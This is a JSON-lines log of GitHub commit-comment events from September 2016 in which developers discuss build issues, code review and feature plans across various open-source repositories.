{"id":"4556897227","type":"CommitCommentEvent","actor":{"login":"marcshilling"},"repo":{"name":"facebook/react-native"},"payload":{"comment":{"id":19004998,"position":null,"line":null,"path":null,"commit_id":"fbd2e139103e3d520f6dfc009d6200f8b8168e35","created_at":"2016-09-13T16:56:35Z","updated_at":"2016-09-13T16:56:35Z","body":"@satya164 @foghina but even using `BaseActivityEventListener`, when running on < RN 0.33, the code won't compile because the new `onActivityResult` method signature does not exist. Am I missing something?"}},"created_at":"2016-09-13T16:56:35Z"}
{"id":"4556903322","type":"CommitCommentEvent","actor":{"login":"guicoelho"},"repo":{"name":"corradio/electricitymap"},"payload":{"comment":{"id":19005015,"position":null,"line":null,"path":null,"commit_id":"bee09e3f3c2779105532d815dd2479121968dc27","created_at":"2016-09-13T16:57:41Z","updated_at":"2016-09-13T16:57:41Z","body":"The diff on main.js is kind of impossible to read. I'm basically wrapping all main code in this switch:\r\nhttp://stackoverflow.com/questions/4565112/javascript-how-to-find-out-if-the-user-browser-is-chrome/13348618#13348618\r\n\r\nIf Chrome is detected run main code, otherwise don't run code and show Chrome Overlay."}},"created_at":"2016-09-13T16:57:41Z"}
{"id":"4556906029","type":"CommitCommentEvent","actor":{"login":"morlovich"},"repo":{"name":"pagespeed/ngx_pagespeed"},"payload":{"comment":{"id":19005025,"position":null,"line":null,"path":null,"commit_id":"8bf48ac77d7ba92487ce57a54e1c82bd36168a50","created_at":"2016-09-13T16:58:09Z","updated_at":"2016-09-13T16:58:09Z","body":"Hmm, right. So the easiest thing to do for you would be to just \"git checkout release-1.11.33.3-beta\" before building. We need to decide the proper course of action overall.\r\n\r\n@jeffkaufman Looks like I caused some trouble with this; and our requirements are kinda inconsistent.\r\nHmm, I could just include the union of the two include paths, that may work with both?\r\n"}},"created_at":"2016-09-13T16:58:09Z"}
{"id":"4556907436","type":"CommitCommentEvent","actor":{"login":"raghavrv"},"repo":{"name":"scikit-learn/scikit-learn"},"payload":{"comment":{"id":19005028,"position":25,"line":602,"path":"sklearn/model_selection/_validation.py","commit_id":"8cfebf2e63b1369ee0caba93cbdd887b369dab50","created_at":"2016-09-13T16:58:23Z","updated_at":"2016-09-13T16:58:23Z","body":"`groups` is used once here for group cvs..."}},"created_at":"2016-09-13T16:58:23Z"}
{"id":"4556909281","type":"CommitCommentEvent","actor":{"login":"SadisticMystic"},"repo":{"name":"roukaour/pokecrystal"},"payload":{"comment":{"id":19005030,"position":null,"line":null,"path":null,"commit_id":"01fc75e4bd3ece37c3e335a8e696255e3b5d1090","created_at":"2016-09-13T16:58:42Z","updated_at":"2016-09-13T16:58:42Z","body":"If nothing else, the rocks could be split into two different types of objects: \"smashable rock 1\" would just be strewn about in the middle of nowhere as a source of encounters, and could respawn after you unload the map and come back (the current behavior); \"smashable rock 2\" would be the one that's used to block off access to certain pathways a la Cut trees, and breaking one of those would make it permanently disappear so you don't have to bring your HM slave every time you want to go back and explore that area."}},"created_at":"2016-09-13T16:58:42Z"}
{"id":"4556910756","type":"CommitCommentEvent","actor":{"login":"raghavrv"},"repo":{"name":"scikit-learn/scikit-learn"},"payload":{"comment":{"id":19005032,"position":21,"line":598,"path":"sklearn/model_selection/_validation.py","commit_id":"8cfebf2e63b1369ee0caba93cbdd887b369dab50","created_at":"2016-09-13T16:58:56Z","updated_at":"2016-09-13T16:58:56Z","body":"And also here for shuffling amongst the samples belonging to the same group..."}},"created_at":"2016-09-13T16:58:56Z"}
{"id":"4556911324","type":"CommitCommentEvent","actor":{"login":"raghavrv"},"repo":{"name":"scikit-learn/scikit-learn"},"payload":{"comment":{"id":19005034,"position":21,"line":598,"path":"sklearn/model_selection/_validation.py","commit_id":"8cfebf2e63b1369ee0caba93cbdd887b369dab50","created_at":"2016-09-13T16:59:02Z","updated_at":"2016-09-13T16:59:02Z","body":"@amueller "}},"created_at":"2016-09-13T16:59:02Z"}
{"id":"4556912305","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":19005036,"position":null,"line":null,"path":null,"commit_id":"c8388746b9daf6e9911f1008e89aef8af55b8b68","created_at":"2016-09-13T16:59:15Z","updated_at":"2016-09-13T16:59:15Z","body":"Also see [Issue 269: Cmake and failed link when using SunCC](https://github.com/weidai11/cryptopp/issues/269)."}},"created_at":"2016-09-13T16:59:15Z"}
{"id":"4556912952","type":"CommitCommentEvent","actor":{"login":"marta-"},"repo":{"name":"phenotips/phenotips"},"payload":{"comment":{"id":19005039,"position":null,"line":null,"path":null,"commit_id":"81942cb0ffa9a8e48c193b8e55fc2024784f7152","created_at":"2016-09-13T16:59:21Z","updated_at":"2016-09-13T16:59:21Z","body":"![lang-menu-xwiki1](https://cloud.githubusercontent.com/assets/651980/18483397/dbeb1128-79b1-11e6-9c1e-52a4bc5990c2.png)\r\n"}},"created_at":"2016-09-13T16:59:21Z"}
{"id":"4556916661","type":"CommitCommentEvent","actor":{"login":"Phatcat"},"repo":{"name":"cmangos/mangos-wotlk"},"payload":{"comment":{"id":19005048,"position":18,"line":5544,"path":"src/game/SpellEffects.cpp","commit_id":"6fb00d32ebfbfea540c3ca899587737a99e8c378","created_at":"2016-09-13T17:00:02Z","updated_at":"2016-09-13T17:00:02Z","body":"Yeah, I see now how it appears, but this is actually because we're in the Spell Effect SummonType which apparently don't need creature info at all (done in all the various DoSummon effects) so I needed to call fetch cInfo here in order to get the right level range... this probably can be improved."}},"created_at":"2016-09-13T17:00:02Z"}
{"id":"4556917890","type":"CommitCommentEvent","actor":{"login":"sdumitriu"},"repo":{"name":"phenotips/phenotips"},"payload":{"comment":{"id":19005050,"position":29,"line":84,"path":"components/patient-data/api/src/main/java/org/phenotips/data/PatientDataController.java","commit_id":"9e2a07d6b1c7256321135aff498cd7cfe4d28937","created_at":"2016-09-13T17:00:17Z","updated_at":"2016-09-13T17:00:17Z","body":"`XWikiDocument` shouldn't be exposed, use `DocumentModelBridge` instead. It's the interface implemented by `XWikiDocument`."}},"created_at":"2016-09-13T17:00:17Z"}
{"id":"4556922114","type":"CommitCommentEvent","actor":{"login":"sdumitriu"},"repo":{"name":"phenotips/phenotips"},"payload":{"comment":{"id":19005063,"position":4,"line":484,"path":"pom.xml","commit_id":"9e2a07d6b1c7256321135aff498cd7cfe4d28937","created_at":"2016-09-13T17:00:57Z","updated_at":"2016-09-13T17:00:57Z","body":"Don't use tabs."}},"created_at":"2016-09-13T17:00:57Z"}
{"id":"4556923650","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":19005070,"position":null,"line":null,"path":null,"commit_id":"bffadd6669d827be1a51c3bf37ff2ba192c804ca","created_at":"2016-09-13T17:01:15Z","updated_at":"2016-09-13T17:01:15Z","body":"The following doc(s) have been deployed to the [peterpanth](https://peterpanth-static-docs.pantheonsite.io/docs) Multidev environment:\n- [docs/aws-s3-drupal](https://peterpanth-static-docs.pantheonsite.io/docs/aws-s3-drupal)\n- [docs/content-delivery-network](https://peterpanth-static-docs.pantheonsite.io/docs/content-delivery-network)\n- [docs/drupal-s3](https://peterpanth-static-docs.pantheonsite.io/docs/drupal-s3)\n- [docs/wordpress-cloudfront](https://peterpanth-static-docs.pantheonsite.io/docs/wordpress-cloudfront)\n- [app/config/sculpin_site.yml](https://github.com/pantheon-systems/documentation/commit/7762d4bd6d0e93ee86c82a2580f2373475af18e6/app/config/sculpin_site.yml)\n"}},"created_at":"2016-09-13T17:01:15Z"}
{"id":"4556926920","type":"CommitCommentEvent","actor":{"login":"LexManos"},"repo":{"name":"LexManos/Scanner"},"payload":{"comment":{"id":19005074,"position":null,"line":null,"path":null,"commit_id":"97753438994d8a45fe424d9d6c00e1e6b055031e","created_at":"2016-09-13T17:01:49Z","updated_at":"2016-09-13T17:01:49Z","body":"You do know you could just add YUNoMakeGoodMap as a maven dependancy right... its hosted on Forge's maven....."}},"created_at":"2016-09-13T17:01:49Z"}
{"id":"4556927968","type":"CommitCommentEvent","actor":{"login":"DenisCarriere"},"repo":{"name":"osmottawa/imports"},"payload":{"comment":{"id":19005084,"position":161,"line":491,"path":"CECCE/schools.geojson","commit_id":"01a7e28c28865781af33b8a413c241244ead261c","created_at":"2016-09-13T17:02:00Z","updated_at":"2016-09-13T17:02:00Z","body":"Nothing was wrong, I just posted the street sign to confirm the street. Realized you corrected it."}},"created_at":"2016-09-13T17:02:00Z"}
{"id":"4556928330","type":"CommitCommentEvent","actor":{"login":"ash199595"},"repo":{"name":"aduggin/accessibility-fails"},"payload":{"comment":{"id":19005086,"position":177,"line":232,"path":"index.html","commit_id":"68adb62816a34010a59faf3d1c014f20c4609b81","created_at":"2016-09-13T17:02:04Z","updated_at":"2016-09-13T17:02:04Z","body":"<th>Autumn</th>"}},"created_at":"2016-09-13T17:02:04Z"}
{"id":"4556931777","type":"CommitCommentEvent","actor":{"login":"XenoDelMoto"},"repo":{"name":"XenoDelMoto/test2"},"payload":{"comment":{"id":19005098,"position":2,"line":2,"path":"README.md","commit_id":"d9dd33bedb97b59b7ba63e8bb7db55271fa8fd8d","created_at":"2016-09-13T17:02:40Z","updated_at":"2016-09-13T17:02:40Z","body":"A test in the boradcast system"}},"created_at":"2016-09-13T17:02:40Z"}
{"id":"4556932272","type":"CommitCommentEvent","actor":{"login":"slackpad"},"repo":{"name":"hashicorp/raft"},"payload":{"comment":{"id":19005099,"position":null,"line":null,"path":null,"commit_id":"a3fb4d6aab7fb78f3de8129bf73a6fa93da0759b","created_at":"2016-09-13T17:02:45Z","updated_at":"2016-09-13T17:02:45Z","body":"This got fixed upstream as well, heads up on a merge conflict here:\r\n\r\n```\r\n\tfuture := r.GetConfiguration()\r\n\tif err := future.Error(); err != nil {\r\n\t\tr.logger.Printf(\"[WARN] raft: could not get configuration for Stats: %v\", err)\r\n\t} else {\r\n\t\tconfiguration := future.Configuration()\r\n\t\ts[\"latest_configuration_index\"] = toString(future.Index())\r\n\t\ts[\"latest_configuration\"] = fmt.Sprintf(\"%+v\", configuration.Servers)\r\n\t...\r\n```"}},"created_at":"2016-09-13T17:02:45Z"}
{"id":"4556932396","type":"CommitCommentEvent","actor":{"login":"DenisCarriere"},"repo":{"name":"osmottawa/imports"},"payload":{"comment":{"id":19005100,"position":107,"line":335,"path":"CECCE/schools.geojson","commit_id":"01a7e28c28865781af33b8a413c241244ead261c","created_at":"2016-09-13T17:02:46Z","updated_at":"2016-09-13T17:02:46Z","body":"Very funny"}},"created_at":"2016-09-13T17:02:46Z"}
{"id":"4556939821","type":"CommitCommentEvent","actor":{"login":"schuemie"},"repo":{"name":"OHDSI/MethodEvaluation"},"payload":{"comment":{"id":19005142,"position":null,"line":null,"path":null,"commit_id":"16eb0f722ae2882b1395c06a198a191cfdd788eb","created_at":"2016-09-13T17:04:11Z","updated_at":"2016-09-13T17:04:11Z","body":"Nope. Because we get a zero-row FFDF object somewhere it crashes. I have a fix, but couldn't build Cyclops to run check (as mentioned in my e-mail). Currently all my machines are busy for the symposium and R-Studio on my laptop is quarantined by our corporate anti-malware software, so I don't have a clean environment to investigate the build issues ;-) \r\n\r\nWill follow up with you in a few days (I hope)."}},"created_at":"2016-09-13T17:04:11Z"}
{"id":"4556947656","type":"CommitCommentEvent","actor":{"login":"uf0"},"repo":{"name":"uf0/test"},"payload":{"comment":{"id":19005172,"position":9,"line":9,"path":"test.md","commit_id":"96a1d8052acf84fae2ed337b7ad14ff07412feea","created_at":"2016-09-13T17:05:34Z","updated_at":"2016-09-13T17:05:34Z","body":"are you sure?"}},"created_at":"2016-09-13T17:05:34Z"}
{"id":"4556949444","type":"CommitCommentEvent","actor":{"login":"kf6kjg"},"repo":{"name":"InWorldz/halcyon"},"payload":{"comment":{"id":19005177,"position":null,"line":null,"path":null,"commit_id":"abc7ab878ea960950375965c7316f227abcc0687","created_at":"2016-09-13T17:05:54Z","updated_at":"2016-09-13T17:05:54Z","body":"There's an absolute path in the dot settings file. A Windows path at that. "}},"created_at":"2016-09-13T17:05:54Z"}
{"id":"4556964211","type":"CommitCommentEvent","actor":{"login":"Phatcat"},"repo":{"name":"Phatcat/mangos-wotlk"},"payload":{"comment":{"id":19005210,"position":null,"line":null,"path":null,"commit_id":"25e0c5f6572601d814c043842472ffb001e94210","created_at":"2016-09-13T17:08:44Z","updated_at":"2016-09-13T17:08:44Z","body":"the issue that still persists is that that pets don't natively ever evade by themselves, so if their master enters evade mode, their pets will not evade with them.\r\n\r\nI didn't rewrite or add any evade functionality. What I tried to do was add a function to the unit class which looks for all guardians, and sends a call to them to start evading.\r\n\r\nAnd then I added a call to this function in the standard evade function which most creatures use.\r\n\r\nDo you really want to check if we should evade on each and every UpdateAI call? because that's what was suggested on OregonCore as well; https://github.com/OregonCore/OregonCore/issues/1460#issuecomment-242269750 - also, what would the condition for start evading be? that their master is evading? what if their master evaded before we could do the check so the master isn't just evaded, but has already reset?"}},"created_at":"2016-09-13T17:08:44Z"}
{"id":"4556967167","type":"CommitCommentEvent","actor":{"login":"3lvis"},"repo":{"name":"vsouza/awesome-ios"},"payload":{"comment":{"id":19005216,"position":null,"line":null,"path":null,"commit_id":"249e68b2f7b43c88b43065331eb7a95b00f68c7d","created_at":"2016-09-13T17:09:17Z","updated_at":"2016-09-13T17:09:17Z","body":"Thanks!"}},"created_at":"2016-09-13T17:09:17Z"}
{"id":"4556978777","type":"CommitCommentEvent","actor":{"login":"bllevy"},"repo":{"name":"hborras/twitter-php-ads-sdk"},"payload":{"comment":{"id":19005231,"position":null,"line":null,"path":null,"commit_id":"730b21fd293d26ada4f54d240bad788fc2bf6dfb","created_at":"2016-09-13T17:11:25Z","updated_at":"2016-09-13T17:11:25Z","body":"Thanks for the timely fix Hector!"}},"created_at":"2016-09-13T17:11:25Z"}
{"id":"4556986269","type":"CommitCommentEvent","actor":{"login":"josokinas"},"repo":{"name":"ExCiteS/geoprint"},"payload":{"comment":{"id":19005245,"position":null,"line":null,"path":null,"commit_id":"9d1c343d8201e3820cd4b25bcd2b91db01898ae3","created_at":"2016-09-13T17:12:47Z","updated_at":"2016-09-13T17:12:47Z","body":"Tests broke due to:\r\n- Random Travis CI build fail on Node.js 5 (not applicable)\r\n- Missing settings"}},"created_at":"2016-09-13T17:12:47Z"}
{"id":"4556986640","type":"CommitCommentEvent","actor":{"login":"codekoala"},"repo":{"name":"ash2k/backoff"},"payload":{"comment":{"id":19005247,"position":null,"line":null,"path":null,"commit_id":"f9480192ecece9e8585c07c8177eab5a97b738e1","created_at":"2016-09-13T17:12:51Z","updated_at":"2016-09-13T17:12:51Z","body":"Would you mind creating a pull request for this in the main repo? This sort of functionality is necessary, imo."}},"created_at":"2016-09-13T17:12:51Z"}
{"id":"4557004518","type":"CommitCommentEvent","actor":{"login":"jaycopeland"},"repo":{"name":"jaycopeland/Opera-data-publication-project"},"payload":{"comment":{"id":19005281,"position":null,"line":null,"path":null,"commit_id":"474c4e543540b85a8691b6f14e0cb53f87552193","created_at":"2016-09-13T17:16:09Z","updated_at":"2016-09-13T17:16:09Z","body":"plate 103B116 was removed because it was imported during a test run. "}},"created_at":"2016-09-13T17:16:09Z"}
{"id":"4557005497","type":"CommitCommentEvent","actor":{"login":"baoson2211"},"repo":{"name":"xuanbka1/ADC_USART1"},"payload":{"comment":{"id":19005284,"position":null,"line":null,"path":null,"commit_id":"609ba868a2c4a901f1022370ad36f002346a7cc8","created_at":"2016-09-13T17:16:19Z","updated_at":"2016-09-13T17:16:19Z","body":"cái này cứ add vào, chưa dùng thì sau này dùng"}},"created_at":"2016-09-13T17:16:19Z"}
{"id":"4557011433","type":"CommitCommentEvent","actor":{"login":"jschueller"},"repo":{"name":"opencollab/arpack-ng"},"payload":{"comment":{"id":19005298,"position":5,"line":12,"path":"CMakeLists.txt","commit_id":"b0e2a142585fa6f2000edeb5be462367e8aaa2c3","created_at":"2016-09-13T17:17:22Z","updated_at":"2016-09-13T17:17:22Z","body":"it sets rpaths on osx by default, otherwise there's a warning with recent cmake versions"}},"created_at":"2016-09-13T17:17:22Z"}
{"id":"4557011954","type":"CommitCommentEvent","actor":{"login":"karno"},"repo":{"name":"fin-alice/StarryEyes"},"payload":{"comment":{"id":19005301,"position":null,"line":null,"path":null,"commit_id":"905acadfa2592e8510bfc6cdd341f92de00723e9","created_at":"2016-09-13T17:17:28Z","updated_at":"2016-09-13T17:17:28Z","body":"maybe you can use this code:\r\n\r\n```\r\nforeach (var url in urls)\r\n{  \r\n    if (!url.url()) continue;  \r\n    ....  \r\n}\r\n```"}},"created_at":"2016-09-13T17:17:28Z"}
{"id":"4557016124","type":"CommitCommentEvent","actor":{"login":"SKART1"},"repo":{"name":"SKART1/test-butler"},"payload":{"comment":{"id":19005307,"position":null,"line":null,"path":null,"commit_id":"6008e72462ae86ac71491ee2273990d36ec8ab8b","created_at":"2016-09-13T17:18:15Z","updated_at":"2016-09-13T17:18:15Z","body":"Should work fine - there is test on it\r\n\r\nBut pay attention - it works only if test-butler installed as system application which can be achieved on emulator (out of the box) or on rooted devices (I am 99% sure you need your application to be system  to change permissions)\r\n\r\nIf  nothing help you may post logs - will try to give advice"}},"created_at":"2016-09-13T17:18:15Z"}
{"id":"4557016718","type":"CommitCommentEvent","actor":{"login":"VANCOLD"},"repo":{"name":"MrCoala/amx-plugins"},"payload":{"comment":{"id":19005308,"position":null,"line":null,"path":null,"commit_id":"49b28542c8edf9a95c441c8ec6c7998424adc996","created_at":"2016-09-13T17:18:21Z","updated_at":"2016-09-13T17:18:21Z","body":"Next big update, will contain:\r\n\r\n- Speedlock\r\n\r\n- Reset-command \r\n  . Resets the player to spawn-points\r\n  . Resets the trains to their original origin & angles\r\n\r\n- ResetTrain is called StopTrain\r\n\r\n- Reset command will be admin locked\r\n\r\n- ResetTrain resets the position & angle of the train to their spawn values\r\n\r\n- Added a info_tfgoal to restart rounds with a corresponding function \r\n\r\n- There will be a disconnect forward to set g_playerArray values to default.\r\n\r\n-------\r\n\r\nWhat do we need to add into the script?\r\n\r\n1. The train-movement part (client_prethink) with path_tracks \r\n2. A 2d / 3d lock for certain trains (you don't want the big one to fly around all over the place)\r\n3. A speed modifier to make it possible to set a higher train speed\r\n   (cvar controlled)\r\n4. Maybe a .cfg to define which trains can move on a flat plane (x and y movement)\r\n    or on every axis (x,y,z)"}},"created_at":"2016-09-13T17:18:21Z"}
{"id":"4557023299","type":"CommitCommentEvent","actor":{"login":"VANCOLD"},"repo":{"name":"MrCoala/amx-plugins"},"payload":{"comment":{"id":19005314,"position":null,"line":null,"path":null,"commit_id":"7d05abfb5fda1ca4fc39d2180b74d5cab237d148","created_at":"2016-09-13T17:19:30Z","updated_at":"2016-09-13T17:19:30Z","body":"Plugin is finished.\r\n\r\nWe could add a teleport effect at the teleport-end entities.\r\nBut that's optional."}},"created_at":"2016-09-13T17:19:30Z"}
{"id":"4557024695","type":"CommitCommentEvent","actor":{"login":"smsanghvi"},"repo":{"name":"smsanghvi/Snehal_ECEN5013"},"payload":{"comment":{"id":19005317,"position":null,"line":null,"path":null,"commit_id":"45b71a6636e93e1a77dc0ccc9031c7d9c64dd3db","created_at":"2016-09-13T17:19:44Z","updated_at":"2016-09-13T17:19:44Z","body":"This has been done through the Beaglebone Black board."}},"created_at":"2016-09-13T17:19:44Z"}
{"id":"4557025899","type":"CommitCommentEvent","actor":{"login":"m-kuhn"},"repo":{"name":"qgis/QGIS"},"payload":{"comment":{"id":19005320,"position":31,"line":31,"path":"src/core/qgsoptionalexpression.h","commit_id":"8cf0ef93c454a02362377e5bce2d8c8c8b6015a4","created_at":"2016-09-13T17:19:59Z","updated_at":"2016-09-13T17:19:59Z","body":"Maybe by implementing at least one method the compiler is forced to actually build the object?\r\nLet's give it a try to add writeXml / readXml methods in QgsOptionalExpression.cpp."}},"created_at":"2016-09-13T17:19:59Z"}
{"id":"4557026626","type":"CommitCommentEvent","actor":{"login":"Shnoulle"},"repo":{"name":"Shnoulle/LimeSurvey-Shnoulle"},"payload":{"comment":{"id":19005324,"position":4,"line":14,"path":"application/views/survey/questions/arrays/5point/answer.php","commit_id":"ef288b91e117e90551d78cbb35ce851dfa579b16","created_at":"2016-09-13T17:20:09Z","updated_at":"2016-09-13T17:20:09Z","body":"Yes : but the css need updating ..... this broke old (2.50) template compatibility for no-more-tables in little screen . This way : the aray still an array in 2.50 template. "}},"created_at":"2016-09-13T17:20:09Z"}
{"id":"4557028522","type":"CommitCommentEvent","actor":{"login":"VANCOLD"},"repo":{"name":"MrCoala/amx-plugins"},"payload":{"comment":{"id":19005326,"position":null,"line":null,"path":null,"commit_id":"78ea8eaf5534e792fc7bb1872d0445ee3e2fdc95","created_at":"2016-09-13T17:20:28Z","updated_at":"2016-09-13T17:20:28Z","body":"Are there more functions that FM uses?\r\n"}},"created_at":"2016-09-13T17:20:28Z"}
{"id":"4557029141","type":"CommitCommentEvent","actor":{"login":"baoson2211"},"repo":{"name":"xuanbka1/ADC_USART1"},"payload":{"comment":{"id":19005328,"position":6,"line":5,"path":"ADC_USART1/include/ADC.h","commit_id":"cfc739db785768f8096ed1fa233dca99d7eb59bb","created_at":"2016-09-13T17:20:34Z","updated_at":"2016-09-13T17:20:34Z","body":"ADC có dùng nhưng không add thư viện.\r\nXem lại nội dung stm32f10x_conf.h"}},"created_at":"2016-09-13T17:20:34Z"}
{"id":"4557029355","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19005329,"position":null,"line":null,"path":null,"commit_id":"641c3a9f93b4c0c91f930aa8f9eb0f9626298526","created_at":"2016-09-13T17:20:37Z","updated_at":"2016-09-13T17:20:37Z","body":"113835705-Low-Temp-Radiant-Variable-Flow-Autosize-Issue (mjwitte) - x86_64-MacOS-10.9-clang: OK (2326 of 2329 tests passed, 0 test warnings)\n\n * 3 tests had: AUD diffs.\n * 3 tests had: EIO diffs.\n * 3 tests had: ERR diffs.\n * 3 tests had: ESO big diffs.\n * 3 tests had: MTR big diffs.\n * 3 tests had: Table big diffs.\n * 1 test had: MTD diffs.\n * 1 test had: ZSZ big diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-641c3a9f93b4c0c91f930aa8f9eb0f9626298526-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-641c3a9f93b4c0c91f930aa8f9eb0f9626298526-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.87%25-yellow.svg)</a> \n"}},"created_at":"2016-09-13T17:20:37Z"}
{"id":"4557030325","type":"CommitCommentEvent","actor":{"login":"jimmywarting"},"repo":{"name":"jahewson/node-byline"},"payload":{"comment":{"id":19005333,"position":93,"line":76,"path":"README.md","commit_id":"647a6b22cded181245cf010c9b4657ea81515359","created_at":"2016-09-13T17:20:47Z","updated_at":"2016-09-13T17:20:47Z","body":"Love it! contains no CoffeeScript^^ lol"}},"created_at":"2016-09-13T17:20:47Z"}
{"id":"4557031231","type":"CommitCommentEvent","actor":{"login":"sylvestre"},"repo":{"name":"opencollab/arpack-ng"},"payload":{"comment":{"id":19005336,"position":5,"line":12,"path":"CMakeLists.txt","commit_id":"b0e2a142585fa6f2000edeb5be462367e8aaa2c3","created_at":"2016-09-13T17:20:58Z","updated_at":"2016-09-13T17:20:58Z","body":"ok, could you add a comment in the code?"}},"created_at":"2016-09-13T17:20:58Z"}
{"id":"4557031370","type":"CommitCommentEvent","actor":{"login":"baoson2211"},"repo":{"name":"xuanbka1/ADC_USART1"},"payload":{"comment":{"id":19005337,"position":6,"line":6,"path":"ADC_USART1/include/Usart.h","commit_id":"cfc739db785768f8096ed1fa233dca99d7eb59bb","created_at":"2016-09-13T17:20:59Z","updated_at":"2016-09-13T17:20:59Z","body":"Tương tự, USART có dùng nhưng không add thư viện.\r\nXem lại nội dung stm32f10x_conf.h"}},"created_at":"2016-09-13T17:20:59Z"}
{"id":"4557032741","type":"CommitCommentEvent","actor":{"login":"iyokeose"},"repo":{"name":"iyokeose/hello-world"},"payload":{"comment":{"id":19005342,"position":null,"line":null,"path":null,"commit_id":"c0fc2636555917874dbee47dc503905e6897994e","created_at":"2016-09-13T17:21:15Z","updated_at":"2016-09-13T17:21:15Z","body":"I talked a lil about myself"}},"created_at":"2016-09-13T17:21:15Z"}
{"id":"4557035417","type":"CommitCommentEvent","actor":{"login":"luixxiul"},"repo":{"name":"brave/browser-laptop"},"payload":{"comment":{"id":19005345,"position":null,"line":null,"path":null,"commit_id":"9bafcc2656a450bed78efbbfec5061aa89243661","created_at":"2016-09-13T17:21:42Z","updated_at":"2016-09-13T17:21:42Z","body":"++ thanks!"}},"created_at":"2016-09-13T17:21:42Z"}
{"id":"4557036428","type":"CommitCommentEvent","actor":{"login":"joeflyyoung"},"repo":{"name":"joeflyyoung/News"},"payload":{"comment":{"id":19005350,"position":22,"line":72,"path":"app/src/main/java/item/my/com/news/Controller/Tab/NewsTabController.java","commit_id":"083b0250c2a0a30d1af1f1db7a8ca6f1cee324b5","created_at":"2016-09-13T17:21:54Z","updated_at":"2016-09-13T17:21:54Z","body":"修改了这里，json可能空内容"}},"created_at":"2016-09-13T17:21:54Z"}
{"id":"4557036731","type":"CommitCommentEvent","actor":{"login":"baoson2211"},"repo":{"name":"xuanbka1/ADC_USART1"},"payload":{"comment":{"id":19005352,"position":8,"line":25,"path":"ADC_USART1/src/main.c","commit_id":"1a75b021d81ab9a531bfac1a682e0d8f48912d60","created_at":"2016-09-13T17:21:57Z","updated_at":"2016-09-13T17:21:57Z","body":"có dùng DMA đọc ADC nhưng cũng ko add thư viện"}},"created_at":"2016-09-13T17:21:57Z"}
{"id":"4557040560","type":"CommitCommentEvent","actor":{"login":"nevermoreW"},"repo":{"name":"niklasad1/TDA383_Concurrent_Programming"},"payload":{"comment":{"id":19005363,"position":36,"line":36,"path":"1/documentation.txt","commit_id":"6a52970bfaacfca456f77fb73ad57ad7aa39e3da","created_at":"2016-09-13T17:22:40Z","updated_at":"2016-09-13T17:22:40Z","body":"For all possible choices of placement of the sensors, there will always exist a maximum input speed for the trains.\r\nThis is due to the brake of the trains, i.e. after a train has been ordered by the program to stop (or, equivalently has its speed set to zero)\r\nthere is an inherent distance which is displaced before the train has actually stopped. This displacement is directly related to a train's input speed.\r\nThus, if the input speed for a given train is too high, it might touch or even stop on the switch it is approaching when ordered to stop, and when tsim is commanded to change direction\r\nof that particular switch, it results in an error of the program.\r\n"}},"created_at":"2016-09-13T17:22:40Z"}
{"id":"4557040918","type":"CommitCommentEvent","actor":{"login":"lileeyao"},"repo":{"name":"xiaoyaoworm/Leetcode-java"},"payload":{"comment":{"id":19005366,"position":22,"line":22,"path":"DP/120_minimumTotal.java","commit_id":"6df5fad89ceb90ef7ce9fa609e1afa1e159dda2a","created_at":"2016-09-13T17:22:44Z","updated_at":"2016-09-13T17:22:44Z","body":"还不是最优解，再考虑一下吧"}},"created_at":"2016-09-13T17:22:44Z"}
{"id":"4557041431","type":"CommitCommentEvent","actor":{"login":"yiminghe"},"repo":{"name":"ant-design/ant-design-mobile"},"payload":{"comment":{"id":19005367,"position":15,"line":51,"path":"components/_util/touchableFeedback.tsx","commit_id":"b3e0068970a0cd09aab8e4b87c094e3f4e60a4b3","created_at":"2016-09-13T17:22:49Z","updated_at":"2016-09-13T17:22:49Z","body":"上层移动组件不需要处理mousedown "}},"created_at":"2016-09-13T17:22:49Z"}
{"id":"4557044636","type":"CommitCommentEvent","actor":{"login":"Phatcat"},"repo":{"name":"cmangos/mangos-wotlk"},"payload":{"comment":{"id":19005374,"position":18,"line":5544,"path":"src/game/SpellEffects.cpp","commit_id":"6fb00d32ebfbfea540c3ca899587737a99e8c378","created_at":"2016-09-13T17:23:22Z","updated_at":"2016-09-13T17:23:22Z","body":"http://wowwiki.wikia.com/wiki/Mechanical_Dragonling\r\n\r\n> Patch changes\r\n\r\n        Patch 4.1.0 - Mechanical Dragonlings are now always level 40 instead of scaling with the engineer's skill.\r\n        Cooldown has been reduced to 5 minutes. \r\n    Bc icon Patch 2.4.3 (2008-07-15): Mechanical Dragonlings once again scale with engineering skill.[citation needed]\r\n    Bc icon Patch 2.4.0 (25-Mar-2008):\r\n        Mechanical Dragonlings are now always level 40 instead of scaling with the engineer's skill.[1]\r\n        Engineering Dragonlings now have a 20 minute cooldown instead of 1 hour\r\n    WoW Icon 16x16 Patch 1.4.0 (2005-05-05): The level of the Mechanical Dragonlings now scale with your engineering skill, so they will be always useful against enemies. Their damage and health has remained the same.\r\n    WoW Icon 16x16 Patch 1.3.0 (07-Mar-2005): Mechanical Whelps have been boosted by five levels in order to be effective longer. Their damage has been slightly decreased to compensate for the additional damage that would have occurred with the change.\r\n\r\nand this\r\n\r\n> Item Level 40\r\n\r\nI'm seeing a connection here, how 'bout you guys? - I'm gonna try verifying this against other items summoning guardians..."}},"created_at":"2016-09-13T17:23:22Z"}
{"id":"4557044775","type":"CommitCommentEvent","actor":{"login":"baoson2211"},"repo":{"name":"xuanbka1/ADC_USART1"},"payload":{"comment":{"id":19005375,"position":51,"line":83,"path":"ADC_USART1/Makefile","commit_id":"84596a63527c37594d48ced219734e34a61c6c8c","created_at":"2016-09-13T17:23:24Z","updated_at":"2016-09-13T17:23:24Z","body":"Thiếu rất nhiều thư viện: ADC, DMA & USART"}},"created_at":"2016-09-13T17:23:24Z"}
